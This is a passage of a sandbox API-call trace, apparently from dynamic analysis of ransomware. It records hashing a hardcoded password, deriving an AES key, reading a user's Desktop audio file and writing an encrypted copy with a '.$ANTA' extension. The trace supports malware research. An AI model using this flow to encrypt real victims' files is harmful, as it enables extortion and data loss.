lpUsedDefaultChar=0x0) returned 20 [0127.818] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0127.818] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0127.818] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContext") returned 0x0 [0127.818] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0127.818] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0127.818] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0127.818] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1796f08, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0127.818] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0127.818] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f08 | out: hHeap=0x1780000) returned 1 [0127.819] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContextA") returned 0x756ffc40 [0127.819] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8b0 | out: hHeap=0x1780000) returned 1 [0127.819] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0127.819] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43921b8 | out: hHeap=0x1780000) returned 1 [0127.819] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0127.819] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0127.819] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0127.819] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0127.819] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0127.819] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0127.819] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8b0 | out: hHeap=0x1780000) returned 1 [0127.819] CryptAcquireContextA (in: phProv=0x144ea08, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144ea08*=0x41a5250) returned 1 [0127.820] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0127.820] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0127.820] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0127.820] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0127.820] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0127.820] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0127.820] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0127.820] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0127.820] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0127.820] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0127.820] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0127.820] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0127.820] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0127.820] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0127.820] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0127.821] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0127.821] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0127.821] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0127.821] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0127.821] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0127.821] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0127.821] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0127.821] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0127.821] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf888 | out: hHeap=0x1780000) returned 1 [0127.821] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0127.821] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0127.821] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0127.821] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0127.821] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0127.821] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0127.821] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0127.821] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0127.821] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0127.821] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0127.821] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0127.821] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0127.821] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0127.821] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0127.821] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0127.822] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0127.822] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0127.822] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0127.822] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0127.822] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0127.822] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0127.822] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0127.822] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90f8 | out: hHeap=0x1780000) returned 1 [0127.822] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0127.822] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0127.822] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e97a0 | out: hHeap=0x1780000) returned 1 [0127.822] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0127.822] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0127.822] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0127.822] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e08 | out: hHeap=0x1780000) returned 1 [0127.822] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0127.822] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0127.822] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0127.822] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392030 | out: hHeap=0x1780000) returned 1 [0127.822] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0127.822] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0127.822] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0127.822] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0127.823] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0127.823] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0127.823] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0127.823] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0127.823] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0127.823] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0127.823] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0127.823] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0127.823] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0127.823] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0127.823] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0127.823] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0127.823] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0127.823] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43ca7c0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0127.824] CryptCreateHash (in: hProv=0x41a5250, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144e778 | out: phHash=0x144e778) returned 1 [0127.824] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0127.824] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2728, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0127.824] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0127.824] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0127.824] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2c08, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0127.825] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0127.825] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0127.825] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0127.825] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43ca910, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0127.825] CryptHashData (hHash=0x41ac640, pbData=0x17e2848, dwDataLen=0x22, dwFlags=0x1) returned 1 [0127.825] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0127.825] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0127.825] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0127.825] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0127.825] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43ca7d8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0127.825] CryptDeriveKey (in: hProv=0x41a5250, Algid=0x6610, hBaseData=0x41ac640, dwFlags=0x1, phKey=0x144e778 | out: phKey=0x144e778*=0x41ac280) returned 1 [0127.825] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0127.825] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0127.825] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0127.825] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1797128, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0127.825] CryptDestroyHash (hHash=0x41ac640) returned 1 [0127.826] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\WrCkWcj.m4a" (normalized: "c:\\users\\fd1hvy\\desktop\\wrckwcj.m4a"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0127.826] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0127.826] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144eeb0 | out: lpNewFilePointer=0x0) returned 1 [0127.826] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa68 [0127.826] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0127.826] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0127.826] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0127.826] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0127.826] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0127.826] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797048 [0127.826] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac640 [0127.826] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0127.827] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0127.827] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0127.827] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0127.827] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0127.827] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0127.827] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0127.827] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0127.827] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0127.827] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797088 [0127.827] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0127.827] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0127.827] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0127.827] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0127.827] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0127.827] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0127.827] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0127.827] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0127.827] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0127.827] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0127.827] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0127.827] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0127.827] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392490 [0127.827] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0127.828] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x43597f8 [0127.828] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x43924c8 [0127.828] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392260 [0127.828] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0127.828] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90b0 [0127.828] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0127.828] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90b0 | out: hHeap=0x1780000) returned 1 [0127.828] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0127.828] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392260 | out: hHeap=0x1780000) returned 1 [0127.828] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0127.828] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0127.828] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0127.828] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac2c0 [0127.828] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x499a008 [0127.828] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0127.828] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0127.828] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\WrCkWcj.m4a.$ANTA" (normalized: "c:\\users\\fd1hvy\\desktop\\wrckwcj.m4a.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0127.891] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0127.891] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0127.891] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0127.891] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0127.891] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0127.891] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0127.891] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0127.891] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0127.891] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0127.891] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0127.891] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0127.892] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0127.892] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0127.892] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0127.892] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0127.892] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0127.892] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0127.892] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac040 [0127.892] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0127.892] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac040 | out: hHeap=0x1780000) returned 1 [0127.892] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0127.892] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac740 [0127.892] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0127.892] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0127.892] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf888 [0127.892] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0127.892] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0127.892] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0127.892] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0127.892] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0127.892] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0127.892] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0127.892] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0127.892] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: 